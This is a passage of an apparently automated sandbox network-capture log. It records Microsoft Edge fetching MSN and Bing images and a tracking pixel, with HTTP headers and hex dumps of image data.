Ascii: _[NKD%]^;iwqX8e2v_++%eG}hT2~]c<{{ox/[5;[C?w_QV)t5#_/<:~9z;kI[h;=$mh7UM0
2024-11-25 23:25:54 UTC	2358	IN	Data Raw: 9c b7 b6 cc ca 6c cc ac 90 00 82 19 23 00 a0 43 11 00 00 05 00 08 40 30 10 ca c8 10 ee 22 d0 60 20 2a 18 80 45 4b 50 12 32 80 04 74 c6 94 e6 d5 90 1c e0 7b 74 f8 29 3c 5e af 8e 8d 27 ad 0e 16 9c 15 f7 ee df d3 e4 73 9c e1 bd 66 5f 2f 1a 53 96 47 a7 0e 06 4d bd ae 4d ae bf 1f 99 f4 f0 82 4d d9 62 96 36 cb bb 28 fc cc d6 29 46 1b 32 57 eb 3f cb 8f 8a 5f 69 eb 39 4e 73 2e b1 84 38 69 f0 74 e2 d5 f1 ba 78 e4 b4 24 b7 b6 f2 6f 2c 4f 42 9d 28 a5 18 da db 56 95 45 9b b6 4d f2 62 81 cf cc bf 96 fd 2a fb 55 e5 9e 1c 9b e5 95 fb 05 1f 54 56 cf a6 92 b4 a7 52 78 39 db 3c 79 37 ed ee 39 4c cb a4 44 43 aa 36 bc f3 7b 4e 4a 3b ba db 95 fa 59 09 3b 6c df 7a 84 dd 92 e5 4b d2 9b 5a 37 da e6 49 ed 47 6a 2f 62 9a 77 95 49 61 29 e3 8b 57 dd 7d 2f 17 90 ef 75 b5 1f d3 86 e7 Data Ascii: l#C@0"` EKP2t{t)<^'sf_/SGMMMb6()F2W?_i9Ns.8itx$o,OB(VEMbUTVRx9<y79LDC6{NJ;Y;lzKZ7IGj/bwIa)W}/u
2024-11-25 23:25:54 UTC	16384	IN	Data Raw: 46 92 5e b8 e0 9c e2 ad 15 94 13 f7 91 9c 94 5f a9 f5 ea 3c b5 2d 7a 16 45 02 7b 55 27 15 8e ce 12 96 57 b5 ed 7d 5a 37 20 be d5 da 76 8a c3 6b 4e a8 ea 1e ca d9 d8 58 41 6f c7 17 de f4 3c f3 65 66 be 1f 82 cb bd 90 43 c7 0b 59 78 3d b2 f7 0f 7b be 6b 3c 92 d5 ef 04 e2 e3 39 2e ac 2f 7e f5 be da 5e b0 83 52 8e db c2 36 ba bf cf 58 07 cb e3 2f c0 33 d2 f4 2d cb bd 82 bb bb dc de 9d fb 3a 5f 84 4d ab 39 3c 21 c9 59 c9 fb 6f 92 03 f0 90 15 c0 f6 9e 61 80 80 06 32 40 81 80 8a 28 92 80 08 18 08 44 43 28 43 34 10 00 c2 90 c6 20 86 31 01 14 c0 00 a0 24 60 19 05 08 02 98 08 61 00 80 00 63 01 80 80 62 0a 63 18 c0 45 00 04 21 81 40 2b 16 20 00 0d e1 6d 25 00 25 61 88 41 14 21 08 8a 40 00 4b 00 c4 22 34 77 10 86 40 87 71 5c 90 00 10 80 00 40 03 10 00 00 5c 42 2a 59 Data Ascii: F^_<-zE{U'W}Z7 vkNXAo<efCYx={k<9./~^R6X/3-:_M9<!Yoa2@(DC(C4 1$`acbcE!@+ m%%aA!@K"4w@q\@\B*Y
2024-11-25 23:25:54 UTC	16192	IN	Data Raw: a5 4e 32 77 95 a5 36 b4 47 75 97 6d 88 34 fc b6 a7 3f 55 59 e1 15 fe 15 a9 66 c1 7e 8b 72 7e ba b5 3d 9b 96 a8 a2 14 b7 d5 92 bc 9e 10 8e 69 68 e7 de c7 7f 25 6d 4a d2 ab 3c 12 f6 6a 8a cd 91 52 d3 a3 4e 51 4f 6a ad 5b e3 ad e1 7c 37 46 2b 70 e4 9c 29 d3 a1 17 79 bb 2d ad 09 75 a5 ab f1 05 6a 11 da 9f aa a4 b0 d6 f4 28 ea e8 c2 17 a1 79 cb d5 56 6f 72 f9 2d 4b 32 8d 95 9d 92 fc b8 7f 9a 5e d0 57 72 db 6a ed 75 63 92 ef d6 73 45 79 11 d9 5e aa 95 1b 69 64 af f2 8c 4b 9b f2 20 a9 c3 d5 52 a5 f1 d7 9c 9f 70 1b 53 5b 5c 4c a4 f1 4a 29 5f c2 f3 8a f9 98 f0 df a9 56 bd 67 bd 4a 54 e3 fb 30 f7 bb 84 df dd a8 28 47 19 c9 6c c6 fb dc 9e 6f e6 c2 cf 86 e1 d5 38 63 52 4b 65 6b 6f 7c 9f cd 80 f8 59 79 b1 9d 48 e1 2a 8d ed 3f 0d b0 b7 37 cc ba 6d 4e 2e 30 c2 09 b4 df Data Ascii: N2w6Gum4?UYf~r~=ih%mJ<jRNQOj[\|7F+p)y-uj(yVor-K2^WrjucsEy^idK RpS[\LJ)_VgJT0(Glo8cRKeko\|YyH*?7mN.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
132	192.168.2.6	49922	104.117.182.56	443	1916	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:54 UTC	634	OUT	GET /tenant/amp/entityid/AA12sf7A.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-25 23:25:54 UTC	520	IN	HTTP/1.1 200 OK Content-Type: image/jpeg Access-Control-Allow-Origin: * Content-Location: https://img.s-msn.com/tenant/amp/entityid/AA12sf7A Last-Modified: Sun, 20 Oct 2024 23:49:33 GMT X-Source-Length: 114962 X-Datacenter: eastus X-ActivityId: f9c97283-f306-495f-9b12-cae296533644 Timing-Allow-Origin: * X-Frame-Options: deny X-ResizerVersion: 1.0 Content-Length: 114962 Cache-Control: public, max-age=44532 Expires: Tue, 26 Nov 2024 11:48:06 GMT Date: Mon, 25 Nov 2024 23:25:54 GMT Connection: close
2024-11-25 23:25:54 UTC	15864	IN	Data Raw: ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02 Data Ascii: XICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmdd
2024-11-25 23:25:54 UTC	16384	IN	Data Raw: da a2 66 d0 8a a6 2d 98 a6 2f 2d 29 89 be 4e 39 24 9e 3c ca c9 6c 03 84 93 dc b9 27 52 75 44 2e 13 33 10 2e 9d 07 af 45 54 38 c5 fd ca e3 2b a2 e5 30 72 b2 4e 32 06 5a 5d 46 06 20 9e a8 4b 44 d3 0b 39 00 9c 91 42 d3 cd 94 78 b4 e5 29 18 34 d8 bf 6e 2a 3c ee 90 16 0a 2e a6 49 37 12 50 5a f0 e3 74 81 04 cd a6 ca 63 78 c9 f2 f4 aa c1 b8 6e 6f c1 04 64 99 c6 4c 77 fa 85 91 06 66 51 24 60 8c c5 af 19 81 9f 72 98 67 ec 48 18 55 cd a0 8b e8 79 1f 4a bb 3d a0 70 81 c6 75 31 fb ca 63 81 85 00 09 c9 5d 6b 0e 86 fe 2a 40 08 9b 22 66 4f 72 b0 01 1c e7 8a 08 04 6c 6d e7 dd e0 af b1 92 09 fa 41 f0 ee 40 b1 c2 d5 dc 61 a4 99 e5 de a6 ac 00 25 b2 1d 88 0c 18 6f 8a 22 79 8e 00 1b a6 01 4a b3 58 d9 91 7d 33 45 27 64 23 d1 cd 05 c4 d3 0b 63 3c a1 49 0d 73 b0 91 11 88 88 e3 Data Ascii: f-/-)N9$<l'RuD.3.ET8+0rN2Z]F KD9Bx)4n<.I7PZtcxnodLwfQ$`rgHUyJ=pu1c]k@"fOrlmA@a%o"yJX}3E'd#c<Is
2024-11-25 23:25:54 UTC	1274	IN	Data Raw: b9 d5 e8 5a 7c d1 4d ed 0a 3b a6 09 1a eb a0 e4 93 89 78 90 60 f0 c5 88 0e 90 a5 56 6a 51 92 95 42 e6 90 73 d2 f9 4c cf ad d5 37 ba 41 92 48 cb 90 27 8f 44 e9 6b 10 72 89 95 a6 d5 0e 7e fc 37 3d 6d 1d 17 01 c6 09 37 ce 07 ee b3 9a 7a 3b 62 32 54 4b 9a ef 4d 86 1d ba 6c 75 13 9c 6b af 92 e6 31 c1 d2 0c 93 63 33 6b c4 dc e4 bc f9 87 4c c3 ae 26 ec ee b6 49 6c 88 06 77 b5 b7 13 75 83 50 82 44 18 eb 3e 07 db 79 58 44 5f e4 d3 0c 59 a2 2f 2e 36 c7 b2 d4 a1 5f 11 20 b0 b1 d7 16 f2 3e c2 57 4f b4 69 19 4c 67 98 10 23 28 0b d3 fa 8f a8 a7 7b 66 29 b4 c4 c4 c6 5d 9c de 76 1b 3c 9f a6 fa 6a b6 37 a6 ab c5 51 31 31 97 9e 8f 56 ed ba 8d 2a e0 87 b1 ae 74 49 91 7f 11 07 c5 5d 63 59 04 e4 64 4c 9e 47 5c 93 a3 77 73 6f 3a 2a 98 8e df db 46 13 76 7b 9b 5b 7b 99 57 44 55 Data Ascii: Z\|M;x`VjQBsL7AH'Dkr~7=m7z;b2TKMluk1c3kL&IlwuPD>yXD_Y/.6_ >WOiLg#({f)]v<j7Q11VtI]cYdLG\wso:Fv{[{WDU
2024-11-25 23:25:54 UTC	16384	IN	Data Raw: 78 cb b7 35 dd 82 1c 23 29 c2 73 e4 42 f4 1f a3 01 9f f3 00 e8 9c 25 b7 81 d0 c6 57 57 b7 46 17 17 7d b9 cb c9 e7 c6 4f 6a 7e 9f 6b fa bc de 79 b5 6a 16 d2 70 73 41 76 36 43 80 c9 96 90 40 99 8b 66 ba 6f d9 a6 06 36 4c 9e cc 16 3b 78 ea 1b 06 c7 42 bd 5b 6b e9 e2 e3 a2 ba e7 37 8f 7b c4 3a f7 28 a2 9c a2 ea 58 2a 16 e2 c3 48 88 06 77 b5 31 26 f7 b8 5d 1a 75 b1 61 a2 f7 34 c0 c8 b6 1b 8b 16 2c a4 92 78 18 85 d9 cb 36 33 7b 65 ab 96 c7 95 f9 39 58 1a c6 b8 96 50 24 5f 0e 07 3a 47 59 85 dd ec e8 b6 71 35 87 98 2e 6e 9d 4f a1 6f e6 e5 c5 b9 da 9f 25 fe 2e 19 71 7d b1 06 e3 73 77 48 c3 70 2c 2f 7e e5 ba b5 a8 3a ab 9b 4d a4 01 68 2e b9 e7 70 7e 2b a6 c7 4c 4d b3 41 4c c2 6a 8c ec 89 6c 83 95 da 65 b9 09 47 ea 19 d8 ba 99 a4 d7 17 38 1c 52 0c 5a 22 e3 da 92 ed Data Ascii: x5#)sB%WWF}Oj~kyjpsAv6C@fo6L;xB[k7{:(X*Hw1&]ua4,x63{e9XP$_:GYq5.nOo%.q}swHp,/~:Mh.p~+LMALjleG8RZ"
2024-11-25 23:25:54 UTC	16384	IN	Data Raw: 50 56 79 c7 fc 76 3f 76 10 e9 04 5b ee 2b b3 ba e6 de 9a e2 78 c4 39 3b c6 35 53 31 cd c8 1b 38 12 5a 5e ec 24 8c 25 b8 26 38 19 32 17 66 a8 a7 8d 80 54 37 9b b4 36 d8 44 df 3c d7 36 0e dd 5d 73 69 98 ce 1d 18 9c b1 7b 4e 4f 1d 50 b8 61 73 88 68 78 c4 2f 98 98 f8 af 45 b4 ff 00 08 66 4f b3 a6 5a dc a3 96 57 e0 bc fc a2 6c ec ae 6d 6b 5b c1 db 69 73 d3 9d f5 84 bb 0b c8 a3 9f cc ef 8a e7 53 ac 69 1c 00 18 18 9c 72 32 0e 5c c4 67 2a 36 e2 f1 3d ac e9 dc 8a 66 5a 55 3a 76 7e e2 69 99 85 05 a5 ea 07 ce 82 42 60 02 4d 00 18 42 00 01 09 80 0d 08 00 04 d2 33 01 09 00 66 92 01 03 42 46 0c 21 23 20 10 91 98 34 92 00 1a 48 00 1a 48 06 4d 2c a4 66 46 92 01 91 a1 00 03 51 39 e1 b6 cc a4 53 36 36 b4 51 8b b0 aa 18 55 cd 4b c9 ee d6 fd 16 5b 93 68 ed 67 33 9e 6d 36 69 Data Ascii: PVyv?v[+x9;5S18Z^$%&82fT76D<6]si{NOPashx/EfOZWlmk[isSir2\g*6=fZU:v~iB`MB3fBF!# 4HHM,fFQ9S66QUK[hg3m6i
2024-11-25 23:25:54 UTC	7952	IN	Data Raw: 99 de f5 63 6b 11 56 b6 1c 50 da 8e 1c be eb 67 a6 4b 48 9c a3 b1 e7 ce f4 44 cc 5f 4f d9 cb 86 73 7a 34 6c cc d3 4c db 5b 4f 9b 86 03 9a 29 b4 8c 98 5a 6f ae 8b 4e 04 d4 63 65 db d1 7d 78 9d 38 2e dc 50 f3 27 7b f1 99 bb 1a 28 98 88 7a 94 ed 7e 51 0f 1f 56 db 70 ff 00 f2 b3 d8 ba 95 ff 00 1f 5e 9e d1 da 4b 63 10 70 92 6f e5 aa f5 ef 7a 7d 1e 5d 3f 57 44 d3 69 89 bd bd b8 bc 8b 5a b8 ed 87 a5 57 d2 d5 8f 14 4c 5a eb cf 2f c5 46 1b 3f cd 4e 71 5a 05 ee 32 ba ee 56 d8 aa 06 d2 30 e7 61 2c aa ec 22 cd 05 da 98 cb aa ed a6 a8 89 9c f8 3c 8a 37 a6 6a d3 2f 97 d9 cd bb 4d 53 46 9c 7f 67 a5 b9 4d 38 27 3c f3 8b 65 9c c4 67 6e aa db 67 e3 a8 ed 8f 6b aa 76 80 b4 16 8c 24 0b 1f f6 95 5f f2 9f 92 ab b1 55 63 58 da 6e 0e 61 76 f0 33 20 c6 84 2f 66 2b 98 65 44 62 8e Data Ascii: ckVPgKHD_Osz4lL[O)ZoNce}x8.P'{(z~QVp^Kcpoz}]?WDiZWLZ/F?NqZ2V0a,"<7j/MSFgM8'<egngkv$_UcXnav3 /f+eDb
2024-11-25 23:25:54 UTC	16384	IN	Data Raw: 33 39 b8 58 6b 99 8a 75 38 7d be a6 cb a9 b4 d4 0d a0 d0 c8 00 cd c3 89 cb 47 5e e0 9e 37 55 74 ca 22 e5 33 2e 40 d9 6b 97 0e d1 ae 6f 00 73 3d c2 55 16 ed 55 41 8c 6e 23 84 9f 7a bb a5 36 93 bb a4 ea 55 40 24 b1 d8 8d a3 80 d2 14 4c da ea c0 69 27 94 ba c3 ce 02 24 8c ee a6 dd 96 b6 6e 63 b8 1b 1f 8e 41 5c a7 55 c4 61 c5 79 bc 62 93 c3 5c ba a1 49 b2 b8 70 6e 9e c8 e6 dd c0 5f 2b 80 07 43 af 35 97 b0 01 8d ef c4 ec 80 cc 47 8d d1 06 8b 05 a6 8b 61 0e 64 1b b8 3b 29 bc 09 12 4b 6c 0e 97 55 08 0e 69 2d 37 91 ca c7 92 19 dc 58 dd ea 1b 39 22 ce 61 13 25 d3 00 18 81 ba eb c4 c0 c8 ae 76 cc e7 d3 99 0e 01 ce ee 83 20 83 f1 e6 9c c5 c1 40 5c da 36 0d a5 d4 de e6 35 93 4a 0b 9a c2 71 83 f5 b4 44 75 32 6c 17 42 96 d8 29 d5 63 e6 03 9b 84 c4 e6 04 72 d2 ca 62 95 Data Ascii: 39Xku8}G^7Ut"3.@kos=UUAn#z6U@$Li'$ncA\Uayb\Ipn_+C5Gad;)KlUi-7X9"a%v @\65JqDu2lB)crb
2024-11-25 23:25:55 UTC	16384	IN	Data Raw: 99 5a 41 18 66 53 40 00 a5 08 06 45 74 d0 0c 89 08 06 09 34 00 19 4d 00 02 42 08 c0 42 00 04 84 00 64 84 00 02 10 0c 89 34 ac 15 72 24 5d 2b 1a ae 92 4d 2b 05 5c 89 09 03 19 04 5d 05 99 9e 41 24 8e f2 71 25 68 08 41 5e 4c 5a 02 68 06 02 69 17 aa a0 e2 39 1a d0 05 08 99 e6 a8 5c 44 f4 48 13 01 4c a6 65 ac 2e 21 b0 8e f4 a5 12 a8 5c 43 48 84 e5 9c c9 aa cd 26 13 96 61 49 47 54 81 09 4d 93 2a 83 84 81 c4 6b 92 cd b5 f0 ba ce aa 62 44 b5 a6 a9 8e 25 16 eb 0e 95 2a 84 98 97 47 af 82 cd 1f e8 90 46 51 3e 2b 83 72 88 b1 ee f6 bd 2d aa e6 e5 b3 9f 07 6e 9b 6a 3e e4 34 5b 22 ef fb 6e 7d aa 16 64 08 02 da 48 69 f0 8f 89 0b cb aa 68 8d 2f af 4f ba aa f6 ca ef 5a 8c 73 ad b4 d2 ff 00 64 53 ed c1 d6 8d a1 b1 21 90 23 ea f3 b1 52 53 63 dd 20 b4 81 c9 cd 3e be 6b 8f f0 Data Ascii: ZAfS@Et4MBBd4r$]+M+\]A$q%hA^LZhi9\DHLe.!\CH&aIGTMkbD%GFQ>+r-nj>4["n}dHih/OZsdS!#RSc >k
2024-11-25 23:25:55 UTC	7952	IN	Data Raw: f3 0a 91 71 e3 e5 e8 5c 78 b9 3b 62 98 e9 e2 ed b7 37 14 d5 3d 7c 3f 45 c8 e6 3c 15 27 17 c5 81 3e 0b 92 ee c8 8a 6f c1 d9 67 0c d5 5d b8 f8 2d c2 e7 76 ae 1a 11 e1 ef 5c b7 77 c5 14 f5 87 65 9e 77 79 57 67 93 a3 0b 9d 8a ae 90 3d 7a ae 0b bb f0 ed f1 7a 13 1e d9 bc e8 ab 73 82 fe 18 d7 e2 b9 c5 d5 9b f3 37 be 3d e1 71 62 bf 0f 93 bb 0e dc fb b3 e9 7f b3 bb 05 b8 fc de 7e 2d c8 f7 a9 f5 b7 dd d3 dd 1c 7c 4f bd 73 05 47 bb 27 b3 a0 3e 92 b8 33 9e 9e 50 ef c1 4c 7b b5 76 cc 3d 1f c6 3a f9 cf dd e7 63 aa 7d fa 7b 22 7f 57 62 dc 5d fe 6f 4a e4 9c 64 66 e1 e1 ef 5e 66 7c bc bf 47 a7 f8 c7 08 f1 fb 3d 4c b9 f9 fe af 2f f2 98 d6 7c 3e ee 83 9c 3e a1 e3 3e d5 cb ec 89 f9 8a e1 a6 99 e9 3e 4f 4b bc 88 f7 61 e8 55 54 47 18 f3 79 5d dc cf bc e8 17 73 5c c3 b3 8c cf Data Ascii: q\x;b7=\|?E<'>og]-v\wewyWg=zzs7=qb~-\|OsG'>3PL{v=:c}{"Wb]oJdf^f\|G=L/\|>>>>OKaUTGy]s\

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
133	192.168.2.6	49920	20.110.205.119	443	1916	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:54 UTC	1279	OUT	GET /c.gif?rnd=1732577146765&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=a83a3db270ec46f296fce94d1b2a9496&activityId=a83a3db270ec46f296fce94d1b2a9496&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=5D1A4457261E4178B59F6A60663A50BE&MUID=0675AFABBF8562701E27BAE9BE8263C5 HTTP/1.1 Host: c.msn.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=0675AFABBF8562701E27BAE9BE8263C5; _EDGE_S=F=1&SID=289DED71267C6C8C1A3EF83327A06D4B; _EDGE_V=1; SM=T; _C_ETH=1; msnup=
2024-11-25 23:25:54 UTC	983	IN	HTTP/1.1 200 OK Cache-Control: private, no-cache, proxy-revalidate, no-store Pragma: no-cache Content-Type: image/gif Last-Modified: Wed, 16 Oct 2024 16:24:13 GMT Accept-Ranges: bytes ETag: "8d3dafd6e71fdb1:0" Server: Microsoft-IIS/10.0 X-Powered-By: ASP.NET P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Set-Cookie: SM=C; domain=c.msn.com; path=/; SameSite=None; Secure; Set-Cookie: MUID=0675AFABBF8562701E27BAE9BE8263C5; domain=.msn.com; expires=Sat, 20-Dec-2025 23:25:54 GMT; path=/; SameSite=None; Secure; Priority=High; Set-Cookie: SRM_M=0675AFABBF8562701E27BAE9BE8263C5; domain=c.msn.com; expires=Sat, 20-Dec-2025 23:25:54 GMT; path=/; SameSite=None; Secure; Set-Cookie: MR=0; domain=c.msn.com; expires=Mon, 02-Dec-2024 23:25:54 GMT; path=/; SameSite=None; Secure; Set-Cookie: ANONCHK=0; domain=c.msn.com; expires=Mon, 25-Nov-2024 23:35:54 GMT; path=/; SameSite=None; Secure; Date: Mon, 25 Nov 2024 23:25:54 GMT Connection: close Content-Length: 42
2024-11-25 23:25:54 UTC	42	IN	Data Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b Data Ascii: GIF89a!,L;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
134	192.168.2.6	49921	150.171.27.10	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:54 UTC	346	OUT	GET /th?id=OADD2.10239370639329_16GDTY03HO5SY2UBG&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: tse1.mm.bing.net Connection: Keep-Alive
2024-11-25 23:25:54 UTC	863	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Length: 770657 Content-Type: image/jpeg Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} X-Cache: CONFIG_NOCACHE Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: 95A4C1FD90914E2D9255D4B936EE09EC Ref B: EWR311000108039 Ref C: 2024-11-25T23:25:54Z Date: Mon, 25 Nov 2024 23:25:53 GMT Connection: close
2024-11-25 23:25:54 UTC	3517	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 1d 32 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 d2 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 35 2e 31 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 31 31 3a 32 31 20 31 36 3a 32 34 3a 32 32 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 04 38 a0 03 00 04 00 00 00 01 00 00 07 80 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 Data Ascii: JFIF``2ExifMM*bj(1r2i``Adobe Photoshop 25.1 (Windows)2023:11:21 16:24:228
2024-11-25 23:25:54 UTC	8192	IN	Data Raw: bb 8e 9d ba fa ec e8 79 70 dc 5c da dc ea 18 48 2e 05 a7 73 ac ad d4 3f 6b eb fd 26 fd e9 fc 31 91 10 95 d9 1e 89 78 f6 3f bc 88 c8 81 c4 36 bd 9c ac fc 9e 9e 3a 79 b5 ad dc 59 02 bc 9b 18 e6 fb be 9d ce ac 97 fe 8d ad ff 00 09 67 d3 b7 f4 9f b8 b9 2c af d9 97 58 5d a6 2d 8d 70 0d b6 b0 76 b9 81 ce 97 3d 83 fc 23 1d ee 73 d8 fd fb 3d 3b 3f 49 f4 17 61 57 45 cf e9 97 e6 db 7b 5b 9d 55 6e d8 d3 ea 06 d5 12 e6 d7 5d cc bb d5 65 4d 67 f2 d9 ff 00 1b ea 2a 6f fa b3 d3 f2 2a 37 5b 8e ca 72 37 06 fe 82 c7 12 d0 47 73 56 da 5f 67 f2 d9 be 9f f8 b4 c1 21 88 d4 b8 81 ee 3a fd 17 4a 26 7e a1 db 66 9f d5 6c 7b 58 db db eb b4 b4 dc 4c 40 76 f0 07 ef bb 6e df 6f f2 56 fb 9e e2 48 6b 5c 75 0c 32 01 d3 f3 bd 87 da e5 99 d0 b0 71 fd 3b 69 ae e2 d7 d5 61 0e ac 86 87 35 df Data Ascii: yp\H.s?k&1x?6:yYg,X]-pv=#s=;?IaWE{[Un]eMgo7[r7GsV_g!:J&~fl{XL@vnoVHk\u2q;ia5
2024-11-25 23:25:54 UTC	4144	IN	Data Raw: 55 4d 2b f5 39 31 78 85 4e c9 3d 59 c5 4f 68 e9 f7 aa 25 cc 46 a5 ba 95 ee a4 df 55 e4 6a d6 29 d8 e8 87 33 5e f1 d2 69 37 d6 56 5a 7c b7 57 36 9f 68 92 4d 9e 5f 99 5c fc cd e6 5d 3b e7 66 5f f2 a4 9a 67 7e 3f 86 99 1a ee a4 a2 93 6c 54 e9 f2 26 fb 9a 1a 95 e4 f7 b3 6f b9 3e 63 c7 54 23 0e cf b5 29 63 5f de 52 ab 18 9b e4 a7 1d 8a 8a 51 56 43 c4 5b 63 91 9a 9d 6b 2a 9e 0d 43 75 e6 29 c3 d4 7c d3 0e 5e 65 a9 3d c3 3f df ff 00 9e 95 02 7c d2 54 d1 c5 33 43 f2 e7 65 49 03 3c 5f 7e 2a 07 74 96 84 13 46 62 93 15 62 da c9 df e7 7f 91 3d 6a 39 23 dd 26 fc 7c 95 a1 70 d2 3d bf fb 11 a5 44 a4 d6 c6 73 a8 d2 49 32 b3 db 42 b5 4e 46 dd 4f f3 5f cb d9 51 73 56 91 70 8b 5b b0 dc 71 b6 a4 50 64 e2 a3 da 69 f0 b3 ab 7c b4 ec 5b 24 b7 81 df ee d3 64 50 b1 fc ff 00 7e ae Data Ascii: UM+91xN=YOh%FUj)3^i7VZ\|W6hM_\];f_g~?lT&o>cT#)c_RQVC[ckCu)\|^e=?\|T3CeI<_~tFbb=j9#&\|p=DsI2BNFO_QsVp[qPdi\|[$dP~
2024-11-25 23:25:54 UTC	8192	IN	Data Raw: 2f 92 b9 6d 56 76 9a e6 4f f9 e5 e6 56 af 9f 67 75 6b b3 fd 5b d5 9b 2f 0c bc 13 79 f7 92 79 96 51 c9 e5 ca 62 3f ec 56 3e ec 1e a3 a2 e9 d2 6e 53 d1 95 ef 8f fc 4b ed fe cd 2c bb 23 8d 3f 77 ff 00 a1 56 a7 80 fc 49 69 e1 dd 43 ed 37 56 71 5e 49 e5 ec b7 f3 7f e5 85 74 9e 00 83 c2 83 44 93 4b ba b3 9a e3 54 b8 de 91 c9 ff 00 3c ff 00 da ac 5d 73 c0 3f 67 f0 c7 f6 ec 3a bd ac 93 25 c3 c7 2d 94 67 e7 8e b1 95 68 4a 4d 1c ea bd 1a 8e 54 aa 5d 2f cc c0 be bc 4b b9 64 79 be fd 55 b5 57 b8 9a 38 6d 7e fd 40 f6 77 3f bc 4a 75 8b 7d 93 cc ff 00 9e d5 bd 92 d8 ed 54 e0 a3 68 32 b6 a9 6f 35 ad c7 92 fd 6a 5b 